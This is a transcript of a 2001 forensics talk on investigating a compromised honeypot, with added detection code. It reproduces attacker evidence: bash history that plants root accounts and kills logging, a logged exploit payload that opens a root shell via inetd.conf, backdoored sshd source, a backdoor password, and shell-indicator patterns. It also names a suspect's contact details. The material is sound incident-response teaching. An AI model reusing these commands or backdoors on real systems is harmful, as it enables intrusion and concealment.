TRANSCRIPT
CanSecWest '01
Digging Through Compromised Systems and Tracking Intruders
Dave Dittrich, Computing & Communications, University of Washington
Outline
- Introduction & background
- Sources of data (external/internal)
- Getting data (gently) off the system
- Analysis
- The Forensic Challenge & developing leads
- "Basic Steps in Forensic Analysis of Unix Systems" & Black Hat course
- Resources on my home page
Sources of Data
External data:
- Probing services (e.g., nmap, Nessus)
- IDS (e.g., Snort)
- tcpdump, ethereal
- Network infrastructure
Sources of Data
Internal data:
- Program output
- System logs
- Application logs (e.g., access_log)
- MD5 checksums of files
- File system contents
- File system attributes
Getting Bits On/Off the System: Removable Media
- Tape
- Floppy
- Jaz/Zip
- CD-R
At least have a SCSI card!
Jaz/Floppy Disc
Formatted with a file system:
  MS-DOS (FAT16, VFAT)
    # mount -t msdos /dev/fd0 /mnt/floppy
  Linux Ext2FS
    # mke2fs /dev/jaz
    # mount /dev/jaz /mnt
Raw (no file system on the medium):
  GNU tar
    # tar -cvzf /dev/fd0 ./dir
  dd
    # dd if=/dev/hda1 of=/mnt/hda1.dd
The dd image goes to a file on the mounted Jaz disk (/mnt above), not to the /dev/jaz device node itself. Record an md5sum of the image as soon as it is written, before anything else touches it.
Getting Bits On/Off the System: Network
- NFS
- rcp/scp
- ftp
- Netcat
- 10Base-T crossover cable
Standard Unix Utilities
ps, netstat, ifconfig, find, last (wtmp), strings, nm, dd, md5sum
Run these from trusted copies (for example, statically linked binaries on your own removable media): a rootkit replaces the system's ps, netstat and friends, so the installed ones cannot be believed.
The Coroner's Toolkit
grave-robber, mactime, lazarus, unrm, ils and icat
http://www.porcupine.org/forensics/
Other Utilities
lsof, Red Hat Package Manager (rpm), Tripwire, TCTUTILS & Autopsy browser
http://www.cerias.purdue.edu/homes/carrier/forensics.html
rpm can verify installed files against the package database, and Tripwire against its own baseline, but only trust the result if the database, the baseline and the verifying binary were themselves kept out of the intruder's reach.
The Forensic Challenge
Subproject of The Honeynet Project: http://project.honeynet.org/challenge/
Top three submissions: Thomas Roessler, Brian Carrier, Peter Kosinar
Follow-on project with law enforcement (not prosecution)
The Forensic Challenge
Approx. time to fully root this box: 30 minutes
Avg. time per investigation: 48 hrs
Avg. time per person: 34 hrs
Avg. incident cost (@ US$70K/yr): US$2,067 +/- $310
Estimated cost for a "pro" job (@ US$300/hr): US$22,620
Suspect Leads
We are NOT law enforcement!
- "Entrapment" is not an issue
- Exempt from ECPA
- Privacy rights are given up by using stolen computer resources
Who is a suspect and who is a victim?
Suspects are innocent until proven guilty in a court of law.
http://eve.speakeasy.org/~dittrich/statement.txt
Timestamp Analysis with TCT
Nov 08 00 06:54:25    33392 .a. -rwxr-xr-x root root /t/bin/cp
                        547 .a. -rw-r--r-- root root /t/etc/named.conf
                     525412 .a. -rwxr-xr-x root root /t/usr/local/sbin/named
                       4096 m.c drwxr-xr-x root root /t/usr/sbin
                     525412 mac -rwxr-xr-x root root /t/usr/sbin/named
                      35504 .a. -rwxr-xr-x root root /t/usr/sbin/ndc
                       2769 .a. -rw-r--r-- root root /t/var/named/named.ca
                        422 .a. -rw-r--r-- root root /t/var/named/named.local
                       1024 m.c drwxr-xr-x root root /t/var/run
                          5 mac -rw-r--r-- root root /t/var/run/named.pid
Columns: date/time (printed once per second), size, which of the m/a/c times fell in that second, permissions, owner, group, path. Read across the one second: cp is executed, /usr/local/sbin/named (525412 bytes) is read and /usr/sbin/named is written with the same size (modified, accessed and changed), and ndc, the zone files and a fresh named.pid show named being started. The pattern is consistent with a replacement named being copied over the system one and started.
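The live-file half of what grave-robber and mactime produce, as an added Python example (not from the slides or from TCT): walk a tree, turn each inode's three timestamps into events, merge events that fall in the same second, and print them in the column order shown above. The demo() tree is constructed; ctime cannot be set from user space, so it lands wherever the file system puts it, which is exactly what gives a copied-in file its telltale old mtime/atime and fresh ctime.

```python
import os
import stat
import tempfile
import time
from collections import defaultdict

def collect_events(root):
    """Return ({(epoch_second, path): ['m'|'.', 'a'|'.', 'c'|'.']}, {path: stat}).

    Every inode contributes up to three events (mtime, atime, ctime).
    Events on the same path in the same second are merged, which is how
    mactime arrives at flag strings such as 'm.c' or 'mac'.
    """
    events = defaultdict(lambda: [".", ".", "."])
    meta = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)          # lstat: never follow symlinks on an image
            meta[path] = st
            for idx, ts in enumerate((st.st_mtime, st.st_atime, st.st_ctime)):
                events[(int(ts), path)][idx] = "mac"[idx]
    return events, meta

def format_timeline(root, since=0):
    """Lines in mactime order: date/time, size, mac flags, perms, uid, gid, path.

    The timestamp is printed once per second and left blank for the
    following entries that share that second, as on the slide.
    """
    events, meta = collect_events(root)
    lines, last = [], None
    for ts, path in sorted(events):
        if ts < since:
            continue
        st = meta[path]
        stamp = time.strftime("%b %d %y %H:%M:%S", time.localtime(ts)) if ts != last else " " * 18
        last = ts
        lines.append("%s %8d %s %s %d %d %s" % (
            stamp, st.st_size, "".join(events[(ts, path)]),
            stat.filemode(st.st_mode), st.st_uid, st.st_gid, path))
    return lines

def demo():
    """Constructed tree: one file whose atime/mtime are pushed into the past
    (as a tar-extracted or touch-ed binary would look) while ctime records
    when it actually landed on this file system."""
    root = tempfile.mkdtemp()
    path = os.path.join(root, "named")
    with open(path, "wb") as f:
        f.write(b"\x7fELF" + b"\0" * 60)
    old = 973666465                      # arbitrary fixed epoch second (Nov 2000)
    os.utime(path, (old, old))           # sets atime and mtime; ctime becomes 'now'
    return format_timeline(root)

if __name__ == "__main__":
    print("\n".join(demo()))
```

The deleted-inode half (ils output) cannot be walked from a mounted tree; it comes from the image, as the later slides show, and is simply concatenated into the same body before sorting.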
String Search in Swap
# strings /attic/forensics/honeypot.hda9.dd | \
    egrep -A3 '[A-Z]+='
. . .
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTSIZE=1000
HOSTNAME=apollo.honeyp.edu
LOGNAME=adm1
REMOTEHOST=c871553-b.jffsn1.mo.home.com
MAIL=/var/spool/mail/adm1
TERM=vt100
HOSTTYPE=i386
PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin
HOME=/root
INPUTRC=/etc/inputrc
SHELL=/bin/bash
USER=adm1
LANG=en_US
OSTYPE=Linux
_=/usr/sbin/named
. . .
This is the environment block of a swapped-out shell: the adm1 account was used, REMOTEHOST records where the login came from, and _ (bash's last executed command) shows /usr/sbin/named being run from that shell.
[Technique by Thomas Roessler]
Deleted .bash_history File
uptime
rm -rf /etc/hosts.deny
touch /etc/hosts.deny
rm -rf /var/log/wtmp
touch /var/log/wtmp
killall -9 klogd
killall -9 syslogd
rm -rf /etc/rc.d/init.d/*log*
echo own:x:0:0::/root:/bin/bash >> /etc/passwd
echo adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash >>/etc/passwd
echo own::10865:0:99999:7:-1:-1:134538460 >> /etc/shadow
echo adm1:Yi2yCGHo0wOwg:10884:0:99999:7:1:1:134538412 >> /etc/sha
cat /etc/inetd.conf | grep tel
exit
Strings Output
# strings - /usr/local/sbin/irpd
. . .
@(#)named 8.2.2-P5 Thu Nov 25 16:18:38 CST 1999 \
    [email protected]:/dev/.oz/src/bin/named
$Id: version.c,v 8.3 1999/01/02 06:05:14 vixie Exp $
named 8.2.2-P5 Thu Nov 25 16:18:38 CST [email protected]:/dev/.oz/src/bin/named
8.2.2-P5
. . .
The file is installed as irpd, but its version strings identify it as a BIND 8.2.2-P5 named built under a hidden directory (/dev/.oz/src), not the vendor's build tree.
Unknown File
# less var/tmp/nap
+-[ User Login ]--------------------- --- --- - -
| username: root password: tw1Lightz0ne hostname: c871553-b.jffsn1.mo.home.com
+------------------------------------ ----- --- -- -- -

# find . -type f | xargs egrep -l "/tmp/nap|User Login"
./usr/local/sbin/sshd1
./var/tmp/nap
The hostname is the same REMOTEHOST seen in swap, and the search for the file's name and banner in file contents points at the binary that writes it: sshd1.
Strings Output
# strings usr/local/sbin/sshd1 | less
. . .
i686-unknown-linux
1.2.27
sshd version %s [%s]
. . .
Unknown group id %d
none
0123456789ABCDEF
0123456789ABCDEF
d33e8f1a6397c6d2efd9a2aae748eb02
Cannot change user when server not running as root.
. . .
A lone 32-hex-digit string next to the hex-digit tables has the shape of an MD5 digest compiled into the daemon.
Strings in Deleted File Space
# for i in 1 5 6 7 8
> do
> echo hda$i; unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6
> done
hda1
hda5
# ./configure --enable-global=d33e8f1a6397c6d2efd9a2aae748eb02 --enable-sshd-log=/usr/tmp/nap --cache-file=.././config.cache
. . .
// "d33e8f1a6397c6d2efd9a2aae748eb02";
#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02"
. . .
echo "running ${CONFIG_SHELL-/bin/sh} ./configure --enable-sshd-log=/usr/tmp/nap --cache-file=.././config.cache
. . .
${ac_eA}USE_GLOBAL_PASS${ac_eB}USE_GLOBAL_PASS${ac_eC}"d33e8f1a6397c6d2efd9a2aae748eb02"${ac_eD}
d33e8f1a6397c6d2efd9a2aae748eb02
hda6
hda7
hda8
Deleted i-node Timestamp Analysis
# grave-robber -c /t -m -d . -o LINUX2
# for i in 1 5 6 7 8
> do
> ils honeypot.hda$i | ils2mac > hda$i.ilsbody
> done
# ls -l *body
-rw-r--r-- 1 root root 3484454 Feb 15 23:01 body
-rw-r--r-- 1 root root     207 Feb 17 14:42 hda1.ilsbody
-rw-r--r-- 1 root root  179650 Feb 17 14:42 hda5.ilsbody
-rw-r--r-- 1 root root     207 Feb 17 14:42 hda6.ilsbody
-rw-r--r-- 1 root root     796 Feb 17 14:42 hda7.ilsbody
-rw-r--r-- 1 root root   12618 Feb 17 14:42 hda8.ilsbody
# cat hda?.ilsbody > body-deleted
# cat body body-deleted > body-full
# mactime -p /t/etc/passwd -g /t/etc/group -b body-full \
    11/06/2000 > mactime.txt
Deleted i-nodes
Aug 09 00 12:52:37 18698240 m.. -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>
Nov 08 00 06:52:59 18698240 .a. -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>
Nov 08 00 06:56:08 18698240 ..c -rw-r--r-- 1010 users <honeypot.hda5.dd-dead-109791>
An 18 MB file owned by uid 1010, last modified in August, was read at 06:52:59 on Nov 8 (shortly before the named replacement at 06:54:25) and unlinked at 06:56:08 (deletion updates ctime). Its content can be pulled from the image with icat by inode number.
Recovered Source
#ifdef USE_GLOBAL_PASS
/* Check if the "global" password was entered */
int check_global_passwd( unsigned char *pass )
{
  /* Paste here the output from md5sum --string="Your_Password" */
  char md5passwd[33]=USE_GLOBAL_PASS; // "3e3a378c63aa1e55e3e9ae9d2bdcd6a1";
  struct MD5Context md;
  unsigned char md5buffer[32];
  int i;

  /* Compute the response. */
  MD5Init(&md);
  MD5Update(&md, pass, strlen( pass));
  MD5Final(md5buffer, &md);
  for( i = 15; i >= 0; i-- ) {
    md5buffer[i*2+1] = (md5buffer[i] & 0xf) + '0';
    md5buffer[i*2] = (md5buffer[i] >> 4) + '0';
  }
The sample digest in the comment is the patch author's placeholder; the build's configure line substitutes the real one through USE_GLOBAL_PASS. As recovered, the nibble loop only adds '0' to each nibble (so 10 to 15 do not become 'a' to 'f' on their own); the rest of the function, including the comparison with md5passwd, is not on the slide.
Confirmation of Backdoor Password
#define USE_GLOBAL_PASS "d33e8f1a6397c6d2efd9a2aae748eb02"

# md5sum --string=tw1Lightz0ne
d33e8f1a6397c6d2efd9a2aae748eb02 "tw1Lightz0ne"
The password captured in /var/tmp/nap hashes to the digest compiled into sshd1, so the logger and the global-password backdoor are the same build. md5sum --string belonged to the old GNU textutils md5sum and is gone from coreutils; printf '%s' tw1Lightz0ne | md5sum gives the same digest (echo would append a newline and change it).
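The checks of the last few slides (pull strings from a suspect binary, pick out anything shaped like an MD5 digest, test captured passwords against it), as an added Python example that is not from the slides: strings() is a minimal re-implementation of the Unix tool, md5_candidates() finds 32-hex-digit tokens, and match_passwords() confirms which captured credential produces one of them. The sshd1 bytes in demo() are a constructed stand-in containing only the strings shown on the slide; the password list is constructed from values that appear on the slides plus decoys.

```python
import hashlib
import re
import string

PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
# 32 lowercase hex digits not flanked by further hex digits (so the two
# "0123456789ABCDEF" tables in sshd do not produce false hits).
HEX32 = re.compile(rb"(?<![0-9A-Fa-f])[0-9a-f]{32}(?![0-9A-Fa-f])")

def strings(data, minlen=4):
    """Minimal 'strings': runs of at least minlen printable ASCII bytes."""
    out, run = [], bytearray()
    for b in data + b"\0":
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= minlen:
            out.append(bytes(run))
        run = bytearray()
    return out

def md5_candidates(data):
    """Every 32-hex-digit token in the binary's strings: possible embedded MD5s."""
    found = set()
    for s in strings(data):
        found.update(m.decode() for m in HEX32.findall(s))
    return sorted(found)

def match_passwords(candidates, passwords):
    """Map each candidate digest to a password from the list that hashes to it.

    MD5 is what the recovered backdoor source uses; swap the digest function
    if a different binary turns out to embed something else.
    """
    wanted = set(candidates)
    hits = {}
    for pw in passwords:
        h = hashlib.md5(pw.encode()).hexdigest()
        if h in wanted:
            hits[h] = pw
    return hits

def demo():
    # Constructed stand-in for the trojaned sshd1: only the string table
    # matters here, so no real ELF structure is needed.
    fake_sshd = b"\x7fELF" + b"\0" * 12 + b"\0".join([
        b"i686-unknown-linux", b"1.2.27", b"sshd version %s [%s]",
        b"Unknown group id %d", b"none",
        b"0123456789ABCDEF", b"0123456789ABCDEF",
        b"d33e8f1a6397c6d2efd9a2aae748eb02",
        b"Cannot change user when server not running as root.",
    ]) + b"\0"
    # Credentials seen on the slides plus decoys (constructed list).
    captured = ["temp123", "root", "tw1Lightz0ne", "changeme"]
    return match_passwords(md5_candidates(fake_sshd), captured)

if __name__ == "__main__":
    for digest, pw in demo().items():
        print("%s <- %r" % (digest, pw))
```

On a real image, feed md5_candidates() the bytes of every binary that grep flagged and the unrm output of each partition, and feed match_passwords() everything a keystroke or login logger on the box recorded.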
Command Line in Swap Space
[root@apollo linux]# ./dd bs=1024 < /dev/hda8 | \
    ./nc 192.168.1.10 10000 -w 3
LANGen_USLANG
A whole shell command line survives in swap. This one appears to be the imaging command itself (./dd piped to ./nc from a directory of trusted binaries, sending hda8 to the analysis host): the responder's own actions leave traces on the box as well, which is one more reason to image before doing anything else.
[Technique by David y Mayka and Thomas Roessler]
Recovering Deleted Syslogs
# unrm honeypot.hda7.dd | less -B
. . .
Nov  7 04:02:00 apollo anacron[1576]: Updated timestamp for job `cron.daily'
Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1
Nov  8 00:08:41 apollo inetd[408]: pid 2078: exit status 1
Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for ho\
stname containing '/': ^D<F7><FF><BF>^D<F7><FF><BF>^E<F7><FF\
><BF>^E<F7><FF><BF>^F<F7><FF><BF>^F<F7><FF><BF>^G<F7><FF><BF\
>^G<F7><FF><BF>08049f10 bffff754 000028f8 4d5f4d53 72204e4f \
65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e69\
61 2720676e 203a272f 000000000000000000000000000000000000000\
. . .
'<88>F*<83><C6> <88>F<AB><89>F<B8><B0>+, <89><F3><8D>N<AC><8\
D>V<B8><CD><80>1<DB><89><D8>@<CD><80><E8><B0><FF><FF><FF>/bi\
n/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /e\
tc/inetd.conf;killall -HUP inetd
Nov  8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily'
The rpc.statd entry has logged the exploit payload that arrived in the SM_MON hostname field: repeated 0xbffff7xx stack addresses, hex words, shellcode, and finally the command it ran, which appends a root shell on port 4545 to inetd.conf and HUPs inetd. Nothing is logged between 00:09 and the next cron job at 04:02, matching the killall -9 syslogd in the recovered history.
[Techniques by Wietse Venema and Peter Kosinar]
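Detection logic for the two things this slide shows in recovered syslog, as an added Python example (not from the slides): a record whose message carries raw bytes, address dumps and a shell command, and a silence in the log where syslogd was killed. SAMPLE_LOG is a constructed, abbreviated rendering of the lines above (the hex dump is cut short and only a few of the raw bytes are kept); the indicator list and the gap threshold are assumptions a responder would tune.

```python
import calendar
import re

# Constructed, abbreviated rendering of the recovered lines on this slide.
SAMPLE_LOG = [
    "Nov  7 04:02:00 apollo anacron[1576]: Updated timestamp for job `cron.daily'",
    "Nov  8 00:08:41 apollo inetd[408]: pid 2077: exit status 1",
    "Nov  8 00:08:41 apollo inetd[408]: pid 2078: exit status 1",
    "Nov  8 00:09:00 apollo rpc.statd[270]: SM_MON request for hostname containing '/': "
    "\x04\xf7\xff\xbf\x04\xf7\xff\xbf\x05\xf7\xff\xbf\x05\xf7\xff\xbf"
    "08049f10 bffff754 000028f8 4d5f4d53 72204e4f "
    "\x89\xf3\x8dN\xac\x8dV\xb8\xcd\x80"
    "/bin/sh -c echo 4545 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd",
    "Nov  8 04:02:00 apollo anacron[2159]: Updated timestamp for job `cron.daily'",
]

SYSLOG = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
                    r"(?P<prog>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
MONTHS = {m: i for i, m in enumerate("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}
# Fragments that mean a command shell reached the logged text (assumed list).
SHELL_IOCS = [r"/bin/sh", r">>\s*/etc/inetd\.conf", r"killall -HUP inetd", r"\bnowait root\b"]

def parse(line):
    m = SYSLOG.match(line)
    return m.groupdict() if m else None

def epoch(ts, year):
    """Syslog timestamps carry no year; the caller supplies it."""
    mon, day, hms = ts.split()
    h, mi, s = (int(x) for x in hms.split(":"))
    return calendar.timegm((year, MONTHS[mon], int(day), h, mi, s, 0, 0, 0))

def suspicious(line):
    """Reasons a record looks like an exploit trace rather than a normal message."""
    rec = parse(line)
    if rec is None:
        return ["unparseable"]
    msg, reasons = rec["msg"], []
    nonprint = sum(1 for ch in msg if ord(ch) < 0x20 or ord(ch) > 0x7e)
    if nonprint >= 8:
        reasons.append("binary bytes in message: %d" % nonprint)
    if re.search(r"\b[0-9a-f]{8}(?: [0-9a-f]{8}){3}\b", msg):
        reasons.append("runs of 32-bit hex words (stack/address dump)")
    for pat in SHELL_IOCS:
        if re.search(pat, msg):
            reasons.append("shell command fragment: " + pat)
    return reasons

def scan(lines):
    """{line index: reasons} for every record that trips a check."""
    out = {}
    for i, line in enumerate(lines):
        r = suspicious(line)
        if r:
            out[i] = r
    return out

def gaps(lines, min_hours, year=2000):
    """Silent stretches between consecutive records; a killed syslogd shows up here."""
    found, prev = [], None
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        t = epoch(rec["ts"], year)
        if prev is not None and t - prev[1] >= min_hours * 3600:
            found.append((prev[0], rec["ts"], round((t - prev[1]) / 3600, 2)))
        prev = (rec["ts"], t)
    return found

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOG).items():
        print(i, reasons)
    for start, end, hours in gaps(SAMPLE_LOG, 3):
        print("gap: %s -> %s (%.2f h)" % (start, end, hours))
```

Gaps need a baseline: on this box the hourly and daily cron entries make four quiet hours stand out, whereas a lightly loaded host may be silent that long every night.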
Contents of IRC Bot Config File
################################################################################
# tPACK.tcl coded by T0R0 - [email protected] - www.falcon-networks.com
################################################################################
set homechan "#tpack"
set admin "TORO X-cess"
set vers "2.3"
set altnick "$nick-"
set username "$nick"
set realname "www.$nick.com"
set userfile ".log.yesterday"
set channel-file ".log.today"
. . .
proc dcc_flags {handle idx arg} {
  set a [lindex $arg 0]
  set z [decrypt xx3fw3 bijph.s5f7N0]
  if {$handle == $z} {
    set p "[decrypt f3qcadr3 DtVgR.E/mLu1]"
    if {$a == $p} {
      if {![validuser $z]} {
        adduser $z *!*[email protected]
        chpass $z temp123
      }
. . .
Decryption (part 1)
egg.log
6692 set z [decrypt xx3fw3 bijph.s5f7N0]                     --> TORO
6694 set p "[decrypt f3qcadr3 DtVgR.E/mLu1]"                  --> die0
6769 set p "[decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/]"           --> reset0
7116 [decrypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1] \
     [decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj.] \
     [decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq.] \
     [decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzY..z0yt0] \
     [decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20] \      --> bind chon - * on_dcc
7328 set wmail "[decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1]" \
     --> [email protected]
The numbers are line numbers in egg.log. Each decrypt call carries its own key as the first argument, so the obfuscation protects nothing: evaluating the calls with the bot's own decrypt command yields the handles, passwords and bindings in clear.
[Technique by Marco Walther]
Decryption (part 2)
# cat e.conf
0$1f0=201i151h221o291H2b1G2U223'2i302n372G2Y2U3E2Z3h2Y2Q3c0A0s1L0N1G141m0=281k1R1A1@1N2V1I2f1&1&1$2P2i342v2R2t322S`@0l0U0q1j0A1C0Q1`0P1q0=1'1c1S171X2s2O2R3A2P3V2@403c3J3m3U0L1S0&1@121I1j1P1B2d1E2m1Q2J262Q2b2C2u3p2H3'2G3B2U3U0A0S0y1a0y1l0@0&0P231a1p1g2l1t201u1X1O2e1S2k1X2L282G282Q2x2x2H03`&000a0F1x2d1D1L1y201Z1T100W0$19140&1k211g1A1q291S2O1S1X1W2X28362l2S2p3u2J3h2L3S3`2N3b1r0D0S0M101'1R141T1q2v1F271F1&1P2C2a2D2a25262H2z2x2n2U2H3c020x0c0j090H0t190y1j0E1a0V0X1Y312k2m2v2t2u3y2Q3O313c323W323l3q1q0I1k0Y1=1g1f161S1r1z1G1C0T1r181T1d1u1g2d1A1G1v2p1W2C252s273c2r2L2F3s2L3f2J3k333k3'0J0z0O0S1x0N1x13291n221D2`1s281O2a1P2C242u2f2y2e2l2y2p2N3g0c170i1m0B1f0B1f0P17111k0$1=1a182E3A2D3G2O3d2=463b3n3c4e0Q0@0O1s1`1p1f1C1h2'1t1m1K1v1I2C2024262I282f2f2v2E352D3d2D2Y2@3R050x0p1v0E1s0P1f0R1N161u1a241g1U1y241x2F1Z2m262J292Q2q3j2I0y171G17211z1@1v2d1M1C1&1L1R2V2a362s3y2J3v2A3e2V3t2W3k38460A0x0u1b0R1z17151a1u1f2d1x1N1v2h1K2k2`1@1X29232`2o382o3A2B2=040T0g0U0l0Y0B0Q0C1F0W1h18211e272v2Y2O3M2V3j374h3l3l3g3a0K1q141y130=1`1R1q2g0U1E111K
Decryption (part 2)
# ./decrypt e.conf e.conf.1     [still looks encrypted]
# ./decrypt e.conf.1 e.conf.2   [still looks encrypted]
# ./decrypt e.conf.2 e.conf.3
# less e.conf.3
bind filt - "\001ACTION *\001" filt_act
proc filt_act {idx text} {
  dccsimul $idx ".me [string trim [lrange $text 1 end] \001]"
}

bind filt - "/me *" filt_telnet_act
proc filt_telnet_act {idx text} {
  dccsimul $idx ".me [lrange $text 1 end]"
}
The file was encrypted three times with the same routine; keep feeding the output back in until readable Tcl appears.
Decryption (when things go right)
set share-users 1
set share-greet 1
set passive 1
set require-p 1
set open-telnets 0
set connect-timeout 15
set channel-file "ch4n"
set init-server { putserv "MODE $botnick +id-ksw" }
set modes-per-line 6

#####################################################
# DeFcon.tcl by AciDpHucK                           #
# 1.32 (4.17.99)                                    #
# NO DISTRO                                         #
#                                                   #
# gREETZ: rei_ayana, tq, wait3r, nermie, Lilly      #
# M1K3, Devin, Cogliastr, kRaZyBoY, danatje, msb    #
# ladicius,siN, ^beerman^, [z], confusion, Brain    #
# vixen, ganymede, Enegiza, noble, bee, miscrient   #
#                                                   #
# contact: [email protected]                        #
#####################################################
Domain Registration
% domain will.fuck.for.an.o-line.st
The authoritative name servers for 'o-line.st' are:
    ns1.falcon-networks.com   63.151.207.126
    ns2.falcon-networks.com   216.206.242.130
(querying server=63.151.207.126 ...)
(querying server=216.206.242.130 ...)
will.fuck.for.an.o-line.st: Internet address = 63.151.207.49

Qwest Communications (NETBLK-NET-QWEST-BLKS-2)
   950 17th St. Suite 1900
   Denver, CO 80202
   US

   Netname: NET-QWEST-BLKS-2
   Netblock: 63.144.0.0 - 63.151.255.255
   Maintainer: QWST

   Coordinator:
      Qwest, NOC (QN-ARIN) [email protected]
      703-363-3001 (FAX) 703-363-3177
More Domain Registration Records
% jwhois 216.206.242.130
[whois.arin.net]
Qwest Communications (NETBLK-NET-QWEST-BLKS-1)
   NET-QWEST-BLKS-1         216.206.0.0 - 216.207.255.255
CREATIVE INTERNET TECHNIQUES (NETBLK-QWEST-216-206-242-64)
   QWEST-216-206-242-64     216.206.242.64 - 216.206.242.255
Falcon Networks (NETBLK-CRTV-FALCON-NETWORKS)
   CRTV-FALCON-NETWORKS     216.206.242.128 - 216.206.242.255
Domain Records...
% jwhois NETBLK-CRTV-FALCON-NETWORKS
[whois.arin.net]
Falcon Networks (NETBLK-CRTV-FALCON-NETWORKS)
   3 Mimosa
   Irvine, CA 92612
   US

   Netname: CRTV-FALCON-NETWORKS
   Netblock: 216.206.242.128 - 216.206.242.255

   Coordinator:
      Mahvi, Mehdi (MM1416-ARIN) [email protected]
      949 552 7210

   Record last updated on 20-Aug-2000.
   Database last updated on 17-Feb-2001 18:26:34 EDT.
Rootkit Config File
# cat /t/usr/libexec/awk/addy.awk
1 65.1
2 65.1
1 134518464.134518444
2 134518464.134518444
1 216.149
2 216.149
Each line pairs a netstat address column (1 local, 2 foreign) with an address string whose connections the trojaned tool hides; note that a string prefix such as 65.1 is looser than a /16 and also covers 65.10 through 65.19.

In all, Teo identifies these netblocks as being hidden:
  63.203.0.0/16
  63.206.0.0/16
  65.1.0.0/16
  209.250.0.0/16
  216.33.0.0/16
  216.149.0.0/16
Eggdrop Debug File
Debug (eggdrop v1.1.6+tPACK 1.6) written Wed Mar 29 13:07:02 2000
Full Patch List:
Context: tclhash.c/793
SOCK ADDR     PORT  NICK       HOST               TYPE
---- -------- ----- ---------- ------------------ ----
6    00000000 6667  (server)   irc.nethead.com    serv
3    D895D302 7756  (telnet)   *                  lstn
4    D895D325 5412  (script)   bounce_con         lstn
8    D1B3E3D5 2977  TORO       lup.earthlink.net  chat  flags: cptEp/234

0xD895D302 is 216.149.211.2 (hermes.alexvoll.com)
0xD1B3E3D5 is 209.179.227.213 (pool0468.cvx12-bradley.dialup.earthlink.net)

The ADDR column is the IPv4 address as a big-endian 32-bit hex value. The first hop (where T0R0 is dialed in) is an Earthlink dialup in Bradley, California (maps.yahoo.com shows it's a small town on Highway 101 about half an hour north of San Luis Obispo).
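Two address conversions this slide and the rootkit config slide call for, as an added Python example (not from the slides or from any rootkit): hex_to_ip() turns the eggdrop ADDR column (big-endian) or a /proc/net/tcp entry (byte-swapped on x86) into a dotted quad, rootkit_netstat() models what a netstat driven by an addy.awk-style hide list would omit, and hidden_connections() is the cross-view check that catches it by comparing the tool's output with what the kernel reports. The /proc/net/tcp excerpt is constructed; reading addy.awk's first column as "1 = local, 2 = foreign" is an assumption.

```python
import socket

# Hide list in the shape of addy.awk: (netstat column, address prefix).
# Column 1 = local address, 2 = foreign address (assumed reading of the file).
HIDE = [("1", "65.1"), ("2", "65.1"), ("1", "216.149"), ("2", "216.149")]

def hex_to_ip(hexstr, little_endian=False):
    """32-bit address printed as 8 hex digits -> dotted quad.

    The eggdrop debug file prints it big-endian (D895D302 is 216.149.211.2);
    /proc/net/tcp on x86 prints it byte-swapped, hence little_endian=True there.
    """
    raw = bytes.fromhex(hexstr)
    if little_endian:
        raw = raw[::-1]
    return socket.inet_ntoa(raw)

def proc_net_tcp(lines):
    """Parse /proc/net/tcp text into (local, foreign) 'ip:port' pairs."""
    conns = []
    for line in lines[1:]:                      # skip the header row
        fields = line.split()
        lip, lport = fields[1].split(":")
        fip, fport = fields[2].split(":")
        conns.append(("%s:%d" % (hex_to_ip(lip, True), int(lport, 16)),
                      "%s:%d" % (hex_to_ip(fip, True), int(fport, 16))))
    return conns

def rootkit_netstat(conns, hide=HIDE):
    """What a trojaned netstat would print: every row whose local (column 1) or
    foreign (column 2) address starts with a hidden prefix is dropped. A string
    prefix is looser than a /16: '65.1' also hides 65.10.x through 65.19.x."""
    shown = []
    for local, foreign in conns:
        cols = {"1": local, "2": foreign}
        if any(cols[col].startswith(prefix) for col, prefix in hide):
            continue
        shown.append((local, foreign))
    return shown

def hidden_connections(kernel_conns, tool_output):
    """Cross-view check: sockets the kernel reports that the tool left out."""
    return sorted(set(kernel_conns) - set(tool_output))

# Constructed /proc/net/tcp excerpt: 192.168.1.10 connected to the bot's
# telnet listener at 216.149.211.2:7756 (address and port from the debug
# file) and to 10.0.2.2:22, which no hide rule covers.
SAMPLE_PROC_NET_TCP = [
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode",
    "   0: 0A01A8C0:0C15 02D395D8:1E4C 01 00000000:00000000 00:00000000 00000000     0        0 1234",
    "   1: 0A01A8C0:0BB8 0202000A:0016 01 00000000:00000000 00:00000000 00000000     0        0 1235",
]

def demo():
    kernel = proc_net_tcp(SAMPLE_PROC_NET_TCP)
    return hidden_connections(kernel, rootkit_netstat(kernel))

if __name__ == "__main__":
    print(hex_to_ip("D895D302"), hex_to_ip("d1b3e3d5"))
    for local, foreign in demo():
        print("hidden by netstat:", local, "->", foreign)
```

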